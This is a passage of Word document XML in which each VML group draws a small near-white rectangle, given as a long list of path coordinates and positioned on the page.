,7188,3146,7192,3146,7197,3146,7201,3146,7205,3146,7209,3146,7214,3146,7219,3146,7223,3146,7228,3146,7233,3146,7238,3146,7243,3146,7248,3146,7253,3146,7259,3146,7264,3146,7270,3146,7275,3146,7281,3146,7287,3146,7293,3146,7299,3146,7305,3146,7311,3146,7318,3146,7318,3146,7318,3146,7318,3146,7318,3146,7318,3146,7318,3146,7318,3146,7318,3146,7318,3146,7318,3146,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3144,7318,3144,7318,3144,7318,3144,7318,3144,7318,3144,7318,3143,7318,3143,7318,3143,7318,3143,7318,3143,7318,3142,7318,3142,7318,3142,7318,3141,7318,3141,7318,3141,7318,3140,7318,3140,7318,3140,7318,3139,7318,3139,7318,3138,7318,3138,7318,3137,7318,3137,7318,3136,7318,3136,7318,3135,7318,3134,7318,3134,7318,3133,7318,3132,7318,3132,7318,3131,7318,3130,7318,3129,7318,3129,7318,3128,7318,3127,7318,3126,7318,3125,7318,3124,7318,3123,7318,3122,7318,3121,7318,3120,7318,3119,7318,3118,7318,3117,7318,3116,7318,3114,7318,3113,7318,3112,7318,3110,7318,3109,7318,3108,7318,3106,7318,3105,7318,3103,7318,3102,7318,3100,7318,3099,7318,3097,7318,3095,7318,3094,7318,3092,7318,3090,7318,3088,7318,3086,7318,3084,7318,3083,7318,3081,7318,3079,7318,3076,7318,3074,7318,3072,7318,3070,7318,3068,7318,3065,7318,3063,7318,3061,7318,3058,7318,3056,7318,3053,7318,3051,7318,3048,7318,3045,7318,3043,7318,3040,7318,3037,7318,3034,7318,3031,7318,3029,7318,3026,7318,3026,7318,3026,7318,3026,7318,3026,7318,3026,7318,3026,7318,3026,7318,3026,7318,3026,7318,3026,7318,3026,7318,3026,7317,3026,7317,3026,7317,3026,7317,3026,7317,3026,7317,3026,7317,3026,7317,3026,7317,3026,7316,3026,7316,3026,7316,3026,7316,3026,7316,3026,7315,3026,7315,3026,7315,3026,7314,3026,7314,3026,7314,3026,7313,3026,7313,3026,7312,3026,7312,3026,7311,3026,7311,3026,7310,3026,7309,3026,7309,3026,7308,3026,7307,3026,7306,3026,7306,3026,7305,3026,7304,3026,7303,3026,7302,3026,7301,3026,7300,3026,7299,3026,7298,3026,7296,3026,7295,3026,7294,3026,7292,3026,7291,3026,7290,3026,7288,3026,7287,3026,7285,3026,7283,3026,7282,3026,7280,3026,7278,3026,7276,3026,7274,3026,7272,3026,7270,3026,7268,3026,7266,3026,7264,3026,7261,3026,7259,3026,7256,3026,7254,3026,7251,3026,7249,3026,7246,3026,7243,3026,7240,3026,7237,3026,7234,3026,7231,3026,7228,3026,7225,3026,7221,3026,7218,3026,7215,3026,7211,3026,7207,3026,7204,3026,7200,3026,7196,3026,7192,3026,7188,3026,7184,3026,7180,3026,7175,3026,7171,3026,7166,3026,7162,3026,7157,3026,7152,3026,7147,3026,7142,3026,7137,3026,7132,3026,7127,3026,7122,3026,7116,3026,7111,3026,7105,3026,7099,3026,7093,3026,7087,3026,7081,3026,7075,3026,7069,3026,7063e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:420.500pt;margin-top:352.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8410,7050" coordsize="130,250">
        <v:shape style="position:absolute;left:8410;top:7050;width:130;height:250" coordorigin="8410,7050" coordsize="130,250" path="m8428,7063l8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8429,7063,8429,7063,8429,7063,8429,7063,8429,7063,8429,7063,8429,7063,8429,7063,8429,7063,8429,7063,8429,7063,8430,7063,8430,7063,8430,7063,8430,7063,8430,7063,8431,7063,8431,7063,8431,7063,8431,7063,8432,7063,8432,7063,8432,7063,8432,7063,8433,7063,8433,7063,8434,7063,8434,7063,8434,7063,8435,7063,8435,7063,8436,7063,8436,7063,8437,7063,8437,7063,8438,7063,8438,7063,8439,7063,8439,7063,8440,7063,8441,7063,8441,7063,8442,7063,8443,7063,8444,7063,8444,7063,8445,7063,8446,7063,8447,7063,8448,7063,8449,7063,8450,7063,8451,7063,8452,7063,8453,7063,8454,7063,8455,7063,8456,7063,8457,7063,8458,7063,8460,7063,8461,7063,8462,7063,8463,7063,8465,7063,8466,7063,8468,7063,8469,7063,8470,7063,8472,7063,8474,7063,8475,7063,8477,7063,8478,7063,8480,7063,8482,7063,8484,7063,8486,7063,8487,7063,8489,7063,8491,7063,8493,7063,8495,7063,8497,7063,8499,7063,8502,7063,8504,7063,8506,7063,8508,7063,8511,7063,8513,7063,8516,7063,8518,7063,8521,7063,8523,7063,8526,7063,8528,7063,8531,7063,8534,7063,8537,7063,8539,7063,8542,7063,8545,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7064,8548,7064,8548,7064,8548,7064,8548,7064,8548,7065,8548,7065,8548,7065,8548,7066,8548,7066,8548,7066,8548,7067,8548,7067,8548,7068,8548,7068,8548,7069,8548,7069,8548,7070,8548,7070,8548,7071,8548,7072,8548,7072,8548,7073,8548,7074,8548,7075,8548,7075,8548,7076,8548,7077,8548,7078,8548,7079,8548,7080,8548,7081,8548,7083,8548,7084,8548,7085,8548,7086,8548,7088,8548,7089,8548,7091,8548,7092,8548,7094,8548,7095,8548,7097,8548,7099,8548,7100,8548,7102,8548,7104,8548,7106,8548,7108,8548,7110,8548,7112,8548,7114,8548,7117,8548,7119,8548,7121,8548,7124,8548,7126,8548,7129,8548,7132,8548,7134,8548,7137,8548,7140,8548,7143,8548,7146,8548,7149,8548,7152,8548,7156,8548,7159,8548,7162,8548,7166,8548,7169,8548,7173,8548,7177,8548,7180,8548,7184,8548,7188,8548,7192,8548,7197,8548,7201,8548,7205,8548,7209,8548,7214,8548,7219,8548,7223,8548,7228,8548,7233,8548,7238,8548,7243,8548,7248,8548,7253,8548,7259,8548,7264,8548,7270,8548,7275,8548,7281,8548,7287,8548,7293,8548,7299,8548,7305,8548,7311,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8547,7318,8547,7318,8547,7318,8547,7318,8547,7318,8547,7318,8547,7318,8546,7318,8546,7318,8546,7318,8546,7318,8546,7318,8545,7318,8545,7318,8545,7318,8544,7318,8544,7318,8544,7318,8543,7318,8543,7318,8543,7318,8542,7318,8542,7318,8541,7318,8541,7318,8540,7318,8540,7318,8539,7318,8539,7318,8538,7318,8538,7318,8537,7318,8536,7318,8536,7318,8535,7318,8534,7318,8534,7318,8533,7318,8532,7318,8531,7318,8530,7318,8530,7318,8529,7318,8528,7318,8527,7318,8526,7318,8525,7318,8524,7318,8523,7318,8522,7318,8521,7318,8519,7318,8518,7318,8517,7318,8516,7318,8514,7318,8513,7318,8512,7318,8510,7318,8509,7318,8508,7318,8506,7318,8505,7318,8503,7318,8501,7318,8500,7318,8498,7318,8496,7318,8495,7318,8493,7318,8491,7318,8489,7318,8487,7318,8485,7318,8483,7318,8481,7318,8479,7318,8477,7318,8475,7318,8473,7318,8470,7318,8468,7318,8466,7318,8463,7318,8461,7318,8459,7318,8456,7318,8453,7318,8451,7318,8448,7318,8446,7318,8443,7318,8440,7318,8437,7318,8434,7318,8431,7318,8428,7318,8428,7318,8428,7318,8428,7318,8428,7318,8428,7318,8428,7318,8428,7318,8428,7318,8428,7318,8428,7318,8428,7318,8428,7317,8428,7317,8428,7317,8428,7317,8428,7317,8428,7317,8428,7317,8428,7317,8428,7317,8428,7316,8428,7316,8428,7316,8428,7316,8428,7316,8428,7315,8428,7315,8428,7315,8428,7314,8428,7314,8428,7314,8428,7313,8428,7313,8428,7312,8428,7312,8428,7311,8428,7311,8428,7310,8428,7309,8428,7309,8428,7308,8428,7307,8428,7306,8428,7306,8428,7305,8428,7304,8428,7303,8428,7302,8428,7301,8428,7300,8428,7299,8428,7298,8428,7296,8428,7295,8428,7294,8428,7292,8428,7291,8428,7290,8428,7288,8428,7287,8428,7285,8428,7283,8428,7282,8428,7280,8428,7278,8428,7276,8428,7274,8428,7272,8428,7270,8428,7268,8428,7266,8428,7264,8428,7261,8428,7259,8428,7256,8428,7254,8428,7251,8428,7249,8428,7246,8428,7243,8428,7240,8428,7237,8428,7234,8428,7231,8428,7228,8428,7225,8428,7221,8428,7218,8428,7215,8428,7211,8428,7207,8428,7204,8428,7200,8428,7196,8428,7192,8428,7188,8428,7184,8428,7180,8428,7175,8428,7171,8428,7166,8428,7162,8428,7157,8428,7152,8428,7147,8428,7142,8428,7137,8428,7132,8428,7127,8428,7122,8428,7116,8428,7111,8428,7105,8428,7099,8428,7093,8428,7087,8428,7081,8428,7075,8428,7069,8428,7063e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:426.500pt;margin-top:352.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8530,7050" coordsize="130,250">
        <v:shape style="position:absolute;left:8530;top:7050;width:130;height:250" coordorigin="8530,7050" coordsize="130,250" path="m8548,7063l8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8549,7063,8549,7063,8549,7063,8549,7063,8549,7063,8549,7063,8549,7063,8549,7063,8549,7063,8549,7063,8549,7063,8549,7063,8550,7063,8550,7063,8550,7063,8550,7063,8550,7063,8550,7063,8551,7063,8551,7063,8551,7063,8551,7063,8552,7063,8552,7063,8552,7063,8553,7063,8553,7063,8553,7063,8554,7063,8554,7063,8554,7063,8555,7063,8555,7063,8556,7063,8556,7063,8557,7063,8557,7063,8558,7063,8558,7063,8559,7063,8560,7063,8560,7063,8561,7063,8561,7063,8562,7063,8563,7063,8564,7063,8564,7063,8565,7063,8566,7063,8567,7063,8568,7063,8569,7063,8570,7063,8571,7063,8572,7063,8573,7063,8574,7063,8575,7063,8576,7063,8577,7063,8578,7063,8580,7063,8581,7063,8582,7063,8583,7063,8585,7063,8586,7063,8588,7063,8589,7063,8591,7063,8592,7063,8594,7063,8595,7063,8597,7063,8599,7063,8600,7063,8602,7063,8604,7063,8606,7063,8607,7063,8609,7063,8611,7063,8613,7063,8615,7063,8617,7063,8620,7063,8622,7063,8624,7063,8626,7063,8628,7063,8631,7063,8633,7063,8636,7063,8638,7063,8641,7063,8643,7063,8646,7063,8648,7063,8651,7063,8654,7063,8657,7063,8660,7063,8662,7063,8665,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7064,8668,7064,8668,7064,8668,7064,8668,7064,8668,7065,8668,7065,8668,7065,8668,7066,8668,7066,8668,7066,8668,7067,8668,7067,8668,7068,8668,7068,8668,7069,8668,7069,8668,7070,8668,7070,8668,7071,8668,7072,8668,7072,8668,7073,8668,7074,8668,7075,8668,7075,8668,7076,8668,7077,8668,7078,8668,7079,8668,7080,8668,7081,8668,7083,8668,7084,8668,7085,8668,7086,8668,7088,8668,7089,8668,7091,8668,7092,8668,7094,8668,7095,8668,7097,8668,7099,8668,7100,8668,7102,8668,7104,8668,7106,8668,7108,8668,7110,8668,7112,8668,7114,8668,7117,8668,7119,8668,7121,8668,7124,8668,7126,8668,7129,8668,7132,8668,7134,8668,7137,8668,7140,8668,7143,8668,7146,8668,7149,8668,7152,8668,7156,8668,7159,8668,7162,8668,7166,8668,7169,8668,7173,8668,7177,8668,7180,8668,7184,8668,7188,8668,7192,8668,7197,8668,7201,8668,7205,8668,7209,8668,7214,8668,7219,8668,7223,8668,7228,8668,7233,8668,7238,8668,7243,8668,7248,8668,7253,8668,7259,8668,7264,8668,7270,8668,7275,8668,7281,8668,7287,8668,7293,8668,7299,8668,7305,8668,7311,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8667,7318,8667,7318,8667,7318,8667,7318,8667,7318,8667,7318,8666,7318,8666,7318,8666,7318,8666,7318,8666,7318,8665,7318,8665,7318,8665,7318,8664,7318,8664,7318,8664,7318,8663,7318,8663,7318,8663,7318,8662,7318,8662,7318,8661,7318,8661,7318,8660,7318,8660,7318,8659,7318,8659,7318,8658,7318,8658,7318,8657,7318,8657,7318,8656,7318,8655,7318,8654,7318,8654,7318,8653,7318,8652,7318,8651,7318,8651,7318,8650,7318,8649,7318,8648,7318,8647,7318,8646,7318,8645,7318,8644,7318,8643,7318,8642,7318,8641,7318,8639,7318,8638,7318,8637,7318,8636,7318,8635,7318,8633,7318,8632,7318,8631,7318,8629,7318,8628,7318,8626,7318,8625,7318,8623,7318,8621,7318,8620,7318,8618,7318,8616,7318,8615,7318,8613,7318,8611,7318,8609,7318,8607,7318,8605,7318,8603,7318,8601,7318,8599,7318,8597,7318,8595,7318,8593,7318,8591,7318,8588,7318,8586,7318,8584,7318,8581,7318,8579,7318,8576,7318,8574,7318,8571,7318,8568,7318,8566,7318,8563,7318,8560,7318,8557,7318,8554,7318,8551,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7317,8548,7317,8548,7317,8548,7317,8548,7317,8548,7317,8548,7317,8548,7317,8548,7317,8548,7316,8548,7316,8548,7316,8548,7316,8548,7316,8548,7315,8548,7315,8548,7315,8548,7314,8548,7314,8548,7314,8548,7313,8548,7313,8548,7312,8548,7312,8548,7311,8548,7311,8548,7310,8548,7309,8548,7309,8548,7308,8548,7307,8548,7306,8548,7306,8548,7305,8548,7304,8548,7303,8548,7302,8548,7301,8548,7300,8548,7299,8548,7298,8548,7296,8548,7295,8548,7294,8548,7292,8548,7291,8548,7290,8548,7288,8548,7287,8548,7285,8548,7283,8548,7282,8548,7280,8548,7278,8548,7276,8548,7274,8548,7272,8548,7270,8548,7268,8548,7266,8548,7264,8548,7261,8548,7259,8548,7256,8548,7254,8548,7251,8548,7249,8548,7246,8548,7243,8548,7240,8548,7237,8548,7234,8548,7231,8548,7228,8548,7225,8548,7221,8548,7218,8548,7215,8548,7211,8548,7207,8548,7204,8548,7200,8548,7196,8548,7192,8548,7188,8548,7184,8548,7180,8548,7175,8548,7171,8548,7166,8548,7162,8548,7157,8548,7152,8548,7147,8548,7142,8548,7137,8548,7132,8548,7127,8548,7122,8548,7116,8548,7111,8548,7105,8548,7099,8548,7093,8548,7087,8548,7081,8548,7075,8548,7069,8548,7063e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:109.500pt;margin-top:365.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2190,7310" coordsize="130,270">
        <v:shape style="position:absolute;left:2190;top:7310;width:130;height:270" coordorigin="2190,7310" coordsize="130,270" path="m2200,7333l2200,7333,2200,7333,2200,7333,2200,7333,2200,7333,2200,7333,2200,7333,2200,7333,2200,7333,2200,7333,2200,7333,2200,7333,2200,7333,2200,7333,2200,7333,2200,7333,2200,7333,2200,7333,2201,7333,2201,7333,2201,7333,2201,7333,2201,7333,2201,7333,2201,7333,2201,7333,2201,7333,2202,7333,2202,7333,2202,7333,2202,7333,2202,7333,2202,7333,2203,7333,2203,7333,2203,7333,2203,7333,2204,7333,2204,7333,2204,7333,2205,7333,2205,7333,2205,7333,2206,7333,2206,7333,2207,7333,2207,7333,2208,7333,2208,7333,2208,7333,2209,7333,2210,7333,2210,7333,2211,7333,2211,7333,2212,7333,2213,7333,2213,7333,2214,7333,2215,7333,2215,7333,2216,7333,2217,7333,2218,7333,2219,7333,2220,7333,2221,7333,2222,7333,2223,7333,2224,7333,2225,7333,2226,7333,2227,7333,2228,7333,2229,7333,2230,7333,2231,7333,2233,7333,2234,7333,2235,7333,2237,7333,2238,7333,2239,7333,2241,7333,2242,7333,2244,7333,2245,7333,2247,7333,2249,7333,2250,7333,2252,7333,2254,7333,2256,7333,2257,7333,2259,7333,2261,7333,2263,7333,2265,7333,2267,7333,2269,7333,2271,7333,2274,7333,2276,7333,2278,7333,2280,7333,2283,7333,2285,7333,2287,7333,2290,7333,2292,7333,2295,7333,2298,7333,2300,7333,2303,7333,2306,7333,2308,7333,2311,7333,2314,7333,2317,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7334,2320,7334,2320,7334,2320,7334,2320,7334,2320,7335,2320,7335,2320,7335,2320,7335,2320,7336,2320,7336,2320,7336,2320,7337,2320,7337,2320,7338,2320,7338,2320,7339,2320,7339,2320,7340,2320,7340,2320,7341,2320,7342,2320,7342,2320,7343,2320,7344,2320,7345,2320,7346,2320,7346,2320,7347,2320,7348,2320,7349,2320,7351,2320,7352,2320,7353,2320,7354,2320,7355,2320,7357,2320,7358,2320,7359,2320,7361,2320,7362,2320,7364,2320,7365,2320,7367,2320,7369,2320,7371,2320,7372,2320,7374,2320,7376,2320,7378,2320,7380,2320,7382,2320,7385,2320,7387,2320,7389,2320,7392,2320,7394,2320,7397,2320,7399,2320,7402,2320,7405,2320,7407,2320,7410,2320,7413,2320,7416,2320,7419,2320,7422,2320,7426,2320,7429,2320,7432,2320,7436,2320,7439,2320,7443,2320,7447,2320,7451,2320,7454,2320,7458,2320,7462,2320,7467,2320,7471,2320,7475,2320,7480,2320,7484,2320,7489,2320,7493,2320,7498,2320,7503,2320,7508,2320,7513,2320,7518,2320,7523,2320,7529,2320,7534,2320,7540,2320,7545,2320,7551,2320,7557,2320,7563,2320,7569,2320,7575,2320,7581,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2319,7588,2319,7588,2319,7588,2319,7588,2319,7588,2319,7588,2319,7588,2318,7588,2318,7588,2318,7588,2318,7588,2318,7588,2317,7588,2317,7588,2317,7588,2317,7588,2316,7588,2316,7588,2316,7588,2315,7588,2315,7588,2315,7588,2314,7588,2314,7588,2313,7588,2313,7588,2312,7588,2312,7588,2311,7588,2311,7588,2310,7588,2310,7588,2309,7588,2308,7588,2308,7588,2307,7588,2306,7588,2306,7588,2305,7588,2304,7588,2303,7588,2302,7588,2301,7588,2301,7588,2300,7588,2299,7588,2298,7588,2297,7588,2296,7588,2295,7588,2294,7588,2292,7588,2291,7588,2290,7588,2289,7588,2288,7588,2286,7588,2285,7588,2284,7588,2282,7588,2281,7588,2279,7588,2278,7588,2276,7588,2275,7588,2273,7588,2272,7588,2270,7588,2268,7588,2266,7588,2265,7588,2263,7588,2261,7588,2259,7588,2257,7588,2255,7588,2253,7588,2251,7588,2249,7588,2247,7588,2245,7588,2242,7588,2240,7588,2238,7588,2235,7588,2233,7588,2230,7588,2228,7588,2225,7588,2223,7588,2220,7588,2217,7588,2215,7588,2212,7588,2209,7588,2206,7588,2203,7588,2200,7588,2200,7588,2200,7588,2200,7588,2200,7588,2200,7588,2200,7588,2200,7588,2200,7588,2200,7588,2200,7588,2200,7588,2200,7588,2200,7588,2200,7587,2200,7587,2200,7587,2200,7587,2200,7587,2200,7587,2200,7587,2200,7587,2200,7586,2200,7586,2200,7586,2200,7586,2200,7585,2200,7585,2200,7585,2200,7585,2200,7584,2200,7584,2200,7583,2200,7583,2200,7582,2200,7582,2200,7581,2200,7581,2200,7580,2200,7580,2200,7579,2200,7578,2200,7577,2200,7577,2200,7576,2200,7575,2200,7574,2200,7573,2200,7572,2200,7571,2200,7570,2200,7569,2200,7568,2200,7567,2200,7565,2200,7564,2200,7563,2200,7561,2200,7560,2200,7558,2200,7557,2200,7555,2200,7553,2200,7552,2200,7550,2200,7548,2200,7546,2200,7544,2200,7542,2200,7540,2200,7538,2200,7536,2200,7534,2200,7531,2200,7529,2200,7526,2200,7524,2200,7521,2200,7519,2200,7516,2200,7513,2200,7510,2200,7507,2200,7504,2200,7501,2200,7498,2200,7495,2200,7492,2200,7488,2200,7485,2200,7481,2200,7477,2200,7474,2200,7470,2200,7466,2200,7462,2200,7458,2200,7454,2200,7450,2200,7445,2200,7441,2200,7436,2200,7432,2200,7427,2200,7422,2200,7418,2200,7413,2200,7408,2200,7402,2200,7397,2200,7392,2200,7386,2200,7381,2200,7375,2200,7369,2200,7364,2200,7358,2200,7352,2200,7345,2200,7339,2200,7333e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:115.500pt;margin-top:365.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2310,7310" coordsize="130,270">
        <v:shape style="position:absolute;left:2310;top:7310;width:130;height:270" coordorigin="2310,7310" coordsize="130,270" path="m2320,7333l2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2320,7333,2321,7333,2321,7333,2321,7333,2321,7333,2321,7333,2321,7333,2321,7333,2321,7333,2321,7333,2321,7333,2322,7333,2322,7333,2322,7333,2322,7333,2322,7333,2323,7333,2323,7333,2323,7333,2323,7333,2323,7333,2324,7333,2324,7333,2324,7333,2325,7333,2325,7333,2325,7333,2326,7333,2326,7333,2327,7333,2327,7333,2328,7333,2328,7333,2329,7333,2329,7333,2330,7333,2330,7333,2331,7333,2331,7333,2332,7333,2333,7333,2333,7333,2334,7333,2335,7333,2336,7333,2336,7333,2337,7333,2338,7333,2339,7333,2340,7333,2341,7333,2342,7333,2343,7333,2344,7333,2345,7333,2346,7333,2347,7333,2348,7333,2349,7333,2350,7333,2351,7333,2353,7333,2354,7333,2355,7333,2357,7333,2358,7333,2359,7333,2361,7333,2362,7333,2364,7333,2365,7333,2367,7333,2369,7333,2370,7333,2372,7333,2374,7333,2376,7333,2377,7333,2379,7333,2381,7333,2383,7333,2385,7333,2387,7333,2389,7333,2391,7333,2394,7333,2396,7333,2398,7333,2400,7333,2403,7333,2405,7333,2407,7333,2410,7333,2412,7333,2415,7333,2418,7333,2420,7333,2423,7333,2426,7333,2429,7333,2431,7333,2434,7333,2437,7333,2440,7333,2440,7333,2440,7333,2440,7333,2440,7333,2440,7333,2440,7333,2440,7333,2440,7333,2440,7333,2440,7333,2440,7333,2440,7333,2440,7333,2440,7333,2440,7333,2440,7333,2440,7333,2440,7333,2440,7334,2440,7334,2440,7334,2440,7334,2440,7334,2440,7335,2440,7335,2440,7335,2440,7335,2440,7336,2440,7336,2440,7336,2440,7337,2440,7337,2440,7338,2440,7338,2440,7339,2440,7339,2440,7340,2440,7340,2440,7341,2440,7342,2440,7342,2440,7343,2440,7344,2440,7345,2440,7346,2440,7346,2440,7347,2440,7348,2440,7349,2440,7351,2440,7352,2440,7353,2440,7354,2440,7355,2440,7357,2440,7358,2440,7359,2440,7361,2440,7362,2440,7364,2440,7365,2440,7367,2440,7369,2440,7371,2440,7372,2440,7374,2440,7376,2440,7378,2440,7380,2440,7382,2440,7385,2440,7387,2440,7389,2440,7392,2440,7394,2440,7397,2440,7399,2440,7402,2440,7405,2440,7407,2440,7410,2440,7413,2440,7416,2440,7419,2440,7422,2440,7426,2440,7429,2440,7432,2440,7436,2440,7439,2440,7443,2440,7447,2440,7451,2440,7454,2440,7458,2440,7462,2440,7467,2440,7471,2440,7475,2440,7480,2440,7484,2440,7489,2440,7493,2440,7498,2440,7503,2440,7508,2440,7513,2440,7518,2440,7523,2440,7529,2440,7534,2440,7540,2440,7545,2440,7551,2440,7557,2440,7563,2440,7569,2440,7575,2440,7581,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2440,7588,2439,7588,2439,7588,2439,7588,2439,7588,2439,7588,2439,7588,2439,7588,2438,7588,2438,7588,2438,7588,2438,7588,2438,7588,2437,7588,2437,7588,2437,7588,2437,7588,2436,7588,2436,7588,2436,7588,2435,7588,2435,7588,2435,7588,2434,7588,2434,7588,2433,7588,2433,7588,2432,7588,2432,7588,2431,7588,2431,7588,2430,7588,2430,7588,2429,7588,2428,7588,2428,7588,2427,7588,2426,7588,2426,7588,2425,7588,2424,7588,2423,7588,2422,7588,2422,7588,2421,7588,2420,7588,2419,7588,2418,7588,2417,7588,2416,7588,2415,7588,2414,7588,2413,7588,2411,7588,2410,7588,2409,7588,2408,7588,2406,7588,2405,7588,2404,7588,2402,7588,2401,7588,2399,7588,2398,7588,2396,7588,2395,7588,2393,7588,2392,7588,2390,7588,2388,7588,2387,7588,2385,7588,2383,7588,2381,7588,2379,7588,2377,7588,2375,7588,2373,7588,2371,7588,2369,7588,2367,7588,2365,7588,2362,7588,2360,7588,2358,7588,2355,7588,2353,7588,2350,7588,2348,7588,2345,7588,2343,7588,2340,7588,2337,7588,2335,7588,2332,7588,2329,7588,2326,7588,2323,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7588,2320,7587,2320,7587,2320,7587,2320,7587,2320,7587,2320,7587,2320,7587,2320,7587,2320,7586,2320,7586,2320,7586,2320,7586,2320,7585,2320,7585,2320,7585,2320,7585,2320,7584,2320,7584,2320,7583,2320,7583,2320,7582,2320,7582,2320,7581,2320,7581,2320,7580,2320,7580,2320,7579,2320,7578,2320,7577,2320,7577,2320,7576,2320,7575,2320,7574,2320,7573,2320,7572,2320,7571,2320,7570,2320,7569,2320,7568,2320,7567,2320,7565,2320,7564,2320,7563,2320,7561,2320,7560,2320,7558,2320,7557,2320,7555,2320,7553,2320,7552,2320,7550,2320,7548,2320,7546,2320,7544,2320,7542,2320,7540,2320,7538,2320,7536,2320,7534,2320,7531,2320,7529,2320,7526,2320,7524,2320,7521,2320,7519,2320,7516,2320,7513,2320,7510,2320,7507,2320,7504,2320,7501,2320,7498,2320,7495,2320,7492,2320,7488,2320,7485,2320,7481,2320,7477,2320,7474,2320,7470,2320,7466,2320,7462,2320,7458,2320,7454,2320,7450,2320,7445,2320,7441,2320,7436,2320,7432,2320,7427,2320,7422,2320,7418,2320,7413,2320,7408,2320,7402,2320,7397,2320,7392,2320,7386,2320,7381,2320,7375,2320,7369,2320,7364,2320,7358,2320,7352,2320,7345,2320,7339,2320,7333e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:397.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,7950" coordsize="130,250">
        <v:shape style="position:absolute;left:2650;top:7950;width:130;height:250" coordorigin="2650,7950" coordsize="130,250" path="m2665,7963l2665,7963,2665,7963,2665,7963,2665,7963,2665,7963,2665,7963,2665,7963,2665,7963,2665,7963,2665,7963,2665,7963,2665,7963,2665,7963,2665,7963,2666,7963,2666,7963,2666,7963,2666,7963,2666,7963,2666,7963,2666,7963,2666,7963,2666,7963,2666,7963,2666,7963,2666,7963,2667,7963,2667,7963,2667,7963,2667,7963,2667,7963,2667,7963,2668,7963,2668,7963,2668,7963,2668,7963,2669,7963,2669,7963,2669,7963,2670,7963,2670,7963,2670,7963,2671,7963,2671,7963,2671,7963,2672,7963,2672,7963,2673,7963,2673,7963,2674,7963,2674,7963,2675,7963,2675,7963,2676,7963,2677,7963,2677,7963,2678,7963,2679,7963,2679,7963,2680,7963,2681,7963,2682,7963,2682,7963,2683,7963,2684,7963,2685,7963,2686,7963,2687,7963,2688,7963,2689,7963,2690,7963,2691,7963,2692,7963,2693,7963,2694,7963,2695,7963,2697,7963,2698,7963,2699,7963,2700,7963,2702,7963,2703,7963,2705,7963,2706,7963,2708,7963,2709,7963,2711,7963,2712,7963,2714,7963,2716,7963,2717,7963,2719,7963,2721,7963,2723,7963,2725,7963,2726,7963,2728,7963,2730,7963,2732,7963,2734,7963,2737,7963,2739,7963,2741,7963,2743,7963,2745,7963,2748,7963,2750,7963,2753,7963,2755,7963,2758,7963,2760,7963,2763,7963,2765,7963,2768,7963,2771,7963,2774,7963,